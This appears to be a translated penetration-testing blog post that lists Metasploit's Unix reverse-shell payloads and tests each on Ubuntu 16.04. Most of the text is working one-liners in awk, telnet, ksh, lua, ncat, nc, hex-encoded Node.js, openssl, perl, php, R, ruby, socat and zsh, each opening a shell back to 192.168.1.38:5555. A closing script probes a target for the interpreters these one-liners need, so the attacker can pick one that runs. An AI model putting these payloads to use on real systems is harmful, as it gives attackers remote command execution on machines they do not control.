msf ships a lot of payloads; let's look at the ones that can be used to get a reverse shell on Unix.
Switch to the msf directory:
./msfvenom -l payloads | grep 'cmd/unix/reverse'
Let's go through them one by one.
awk 'BEGIN{s="/inet/tcp/0/192.168.1.38/5555";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
On Ubuntu 16.04 this awk command fails: the /inet/tcp/... special file is a gawk extension, and Ubuntu's default awk is mawk. Everyone online seems to run this one on CentOS, whose awk is gawk. gawk is not a default command on Ubuntu 16.04 and has to be installed separately, which goes against what I had assumed.
This one doesn't need testing; the earlier articles covered it far more thoroughly than this.
mkfifo hoDXPErDo && telnet -z verify=0 192.168.1.38 5555 0<hoDXPErDo | $(which $0) 1>hoDXPErDo & sleep 10 && rm hoDXPErDo &
As you can see, the telnet shipped with Ubuntu 16.04 has no -z option, so this fails; I don't know whether it runs on CentOS.
Enough said. Just remember to run it from sh: the $(which $0) in the payload spawns whatever $0 resolves to, and from an interactive login shell that is "-bash", which which cannot find.
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('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')));"|jjs
As you can see, using jjs for a reverse shell requires a Java environment (jjs is the Nashorn engine that ships with the JDK), and Ubuntu 16.04 does not install one by default.
ksh -c 'ksh >/dev/tcp/192.168.1.38/5555 2>&1 <&1'
ksh is not shipped with Ubuntu 16.04.
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.38',5555);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
No need to think about it: there is no way Ubuntu 16.04 ships Lua by default (don't ask me how I'm so sure). Note this payload also needs the luasocket module, not just the interpreter.
ncat -e /bin/sh --ssl 192.168.1.38 5555
ncat is a component of Nmap and is not present on a default Ubuntu 16.04.
mkfifo /tmp/gbiwa; nc 192.168.1.38 5555 0</tmp/gbiwa | /bin/sh >/tmp/gbiwa 2>&1; rm /tmp/gbiwa
See the earlier article on nc reverse shells.
node -e 'eval("\x20\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x20\x76\x61\x72\x20\x72\x65\x71\x75\x69\x72\x65\x20\x3d\x20\x67\x6c\x6f\x62\x61\x6c\x2e\x72\x65\x71\x75\x69\x72\x65\x20\x7c\x7c\x20\x67\x6c\x6f\x62\x61\x6c\x2e\x70\x72\x6f\x63\x65\x73\x73\x2e\x6d\x61\x69\x6e\x4d\x6f\x64\x75\x6c\x65\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x2e\x5f\x6c\x6f\x61\x64\x3b\x20\x69\x66\x20\x28\x21\x72\x65\x71\x75\x69\x72\x65\x29\x20\x72\x65\x74\x75\x72\x6e\x3b\x20\x76\x61\x72\x20\x63\x6d\x64\x20\x3d\x20\x28\x67\x6c\x6f\x62\x61\x6c\x2e\x70\x72\x6f\x63\x65\x73\x73\x2e\x70\x6c\x61\x74\x66\x6f\x72\x6d\x2e\x6d\x61\x74\x63\x68\x28\x2f\x5e\x77\x69\x6e\x2f\x69\x29\x29\x20\x3f\x20\x22\x63\x6d\x64\x22\x20\x3a\x20\x22\x2f\x62\x69\x6e\x2f\x73\x68\x22\x3b\x20\x76\x61\x72\x20\x6e\x65\x74\x20\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x6e\x65\x74\x22\x29\x2c\x20\x63\x70\x20\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73\x22\x29\x2c\x20\x75\x74\x69\x6c\x20\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x75\x74\x69\x6c\x22\x29\x2c\x20\x73\x68\x20\x3d\x20\x63\x70\x2e\x73\x70\x61\x77\x6e\x28\x63\x6d\x64\x2c\x20\x5b\x5d\x29\x3b\x20\x76\x61\x72\x20\x63\x6c\x69\x65\x6e\x74\x20\x3d\x20\x74\x68\x69\x73\x3b\x20\x76\x61\x72\x20\x63\x6f\x75\x6e\x74\x65\x72\x3d\x30\x3b\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x53\x74\x61\x67\x65\x72\x52\x65\x70\x65\x61\x74\x28\x29\x7b\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x20\x3d\x20\x6e\x65\x74\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x35\x35\x35\x35\x2c\x20\x22\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x33\x38\x22\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x20\x7b\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x70\x69\x70\x65\x28\x73\x68\x2e\x73\x74\x64\x69\x6e\x29\x3b\x20\x69\x66\x20\x28\x74\x79\x70\x65\x6f\x66\x20\x75\x74\x69\x6c\x2e\x70\x75\x6d\x70\x20\x3d\x3d\x3d\x20\x22\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x22\x29\x20\x7b\x20\x73\x68\x2e\x73\x74\x64\x6f\x75\x74\x2e\x70\x69\x70\x65\x28\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x73\x68\x2e\x73\x74\x64\x65\x72\x72\x2e\x70\x69\x70\x65\x28\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x7b\x20\x75\x74\x69\x6c\x2e\x70\x75\x6d\x70\x28\x73\x68\x2e\x73\x74\x64\x6f\x75\x74\x2c\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x75\x74\x69\x6c\x2e\x70\x75\x6d\x70\x28\x73\x68\x2e\x73\x74\x64\x65\x72\x72\x2c\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x7d\x20\x7d\x29\x3b\x20\x73\x6f\x63\x6b\x65\x74\x2e\x6f\x6e\x28\x22\x65\x72\x72\x6f\x72\x22\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x72\x72\x6f\x72\x29\x20\x7b\x20\x63\x6f\x75\x6e\x74\x65\x72\x2b\x2b\x3b\x20\x69\x66\x28\x63\x6f\x75\x6e\x74\x65\x72\x3c\x3d\x20\x31\x30\x29\x7b\x20\x73\x65\x74\x54\x69\x6d\x65\x6f\x75\x74\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x20\x7b\x20\x53\x74\x61\x67\x65\x72\x52\x65\x70\x65\x61\x74\x28\x29\x3b\x7d\x2c\x20\x35\x2a\x31\x30\x30\x30\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x70\x72\x6f\x63\x65\x73\x73\x2e\x65\x78\x69\x74\x28\x29\x3b\x20\x7d\x29\x3b\x20\x7d\x20\x53\x74\x61\x67\x65\x72\x52\x65\x70\x65\x61\x74\x28\x29\x3b\x20\x7d\x29\x28\x29\x3b");'
From the look of it this uses Node.js to eval a hex-escaped string. It is not shellcode, just JavaScript source with every character written as \xNN: decoded, it spawns /bin/sh with child_process, pipes the socket into the shell's stdin and the shell's stdout/stderr back into the socket to 192.168.1.38:5555, and retries the connection on error.
Ubuntu 16.04 does not ship Node.js.
sh -c '(sleep 3797|openssl s_client -quiet -connect 192.168.1.38:5555|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 192.168.1.38:5555 >/dev/null 2>&1 &)'
This payload is not quite the same as the openssl one we used before, but it's close: it opens two TLS connections to the listener, the first one feeds whatever the listener sends into sh, and the shell's output goes out over the second one. The sleep just keeps the first s_client's stdin open.
Nice, another openssl shell variant.
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.38:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
As you can see it failed; the problem is with the IO library. If you want a perl reverse shell, see the earlier article.
perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"192.168.1.38:5555",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.1.38:5555",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
Same problem here.
python -c "exec('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'.decode('base64'))"
Ubuntu 16.04 ships python3 by default, while this payload targets Python 2 (str.decode('base64') does not exist in Python 3); see the earlier python3 section.
python -c "exec('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'.decode('base64'))" >/dev/null 2>&1 &
Same problem here.
R -e "s<-socketConnection(host='192.168.1.38',port=5555,blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines(pipe(readLines(s, 1))),s)}"
R is not installed by default either.
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.38","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Ruby is not installed on Ubuntu 16.04 either.
ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("192.168.1.38","5555")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end'
Same reason as above.
socat udp-connect:192.168.1.38:5555 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
Ubuntu 16.04 does not install socat by default.
sh -c '(sleep 4119|telnet -z 192.168.1.38 5555|while : ; do sh && break; done 2>&1|telnet -z 192.168.1.38 5555 >/dev/null 2>&1 &)'
telnet has no -z option; next.
Creates an interactive shell through an inbound connection (stub only, no payload)
That is the description of this payload. It does not generate a reverse-shell command, and I searched Chinese and foreign articles without finding an explanation.
From testing, it appears to be just an nc-style listener: you can set it in exploit/multi/handler to catch shells thrown back by bash, python3 and so on. Listening for openssl or meterpreter sessions this way fails.
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.38 5555 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
zsh is not installed by default either, though many distributions do ship it.
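Pulling the results above together: almost every failure was a missing interpreter or a wrong flavour of one (mawk instead of gawk, python3 instead of python2, a telnet without -z). The script below is an added example, not from the original post or from Metasploit, that probes a box for exactly those prerequisites so you can pick a one-liner that will actually run before sending it. The tool names are the ones used by the commands tested above; it touches no network, and the awk and python detection is a reasonable heuristic, not an exhaustive one.

```shell
#!/bin/sh
# Added example (not from the original post): probe a target for the tools
# the cmd/unix/reverse* one-liners above depend on. Runs entirely offline.

# Return 0 if a command is on PATH, 1 otherwise.
have_cmd() { command -v "$1" >/dev/null 2>&1; }

# Print "<tool> ok" or "<tool> missing" for one tool.
check_tool() {
  if have_cmd "$1"; then echo "$1 ok"; else echo "$1 missing"; fi
}

# Which awk is this? Only gawk implements the /inet/tcp/... special files the
# awk payload relies on; Ubuntu's default awk is mawk, which has no networking,
# so "awk is present" is not enough on its own.
awk_flavor() {
  have_cmd awk || { echo none; return 0; }
  if awk --version </dev/null 2>/dev/null | grep -q 'GNU Awk'; then
    echo gawk
  elif awk -W version </dev/null 2>&1 | grep -qi mawk; then
    echo mawk
  else
    echo other
  fi
}

# Return 0 if perl can load the named module (IO::Socket::SSL for the perl SSL
# payload), 1 if perl is absent or the module is not installed.
perl_has_module() {
  have_cmd perl || return 1
  perl -M"$1" -e 1 >/dev/null 2>&1
}

# Major version of whatever "python" resolves to, or "none". The msfvenom
# python payloads use str.decode('base64'), which only exists on Python 2.
python_major() {
  have_cmd python || { echo none; return 0; }
  python -c 'import sys; print(sys.version_info[0])' 2>/dev/null || echo none
}

# Run every check and print a report.
probe_all() {
  for t in awk bash telnet jjs ksh lua ncat nc node openssl perl php python R ruby socat zsh; do
    check_tool "$t"
  done
  echo "awk flavor: $(awk_flavor)"
  echo "python major version: $(python_major)"
  if perl_has_module IO::Socket::SSL; then
    echo "perl IO::Socket::SSL: ok"
  else
    echo "perl IO::Socket::SSL: missing"
  fi
}

probe_all
```

Run it with sh on the target (or paste the functions into an existing shell); a default Ubuntu 16.04 box should report mawk, no python, and most of the interpreters missing, which matches the results above and leaves the bash, sh/nc and openssl one-liners as the realistic choices.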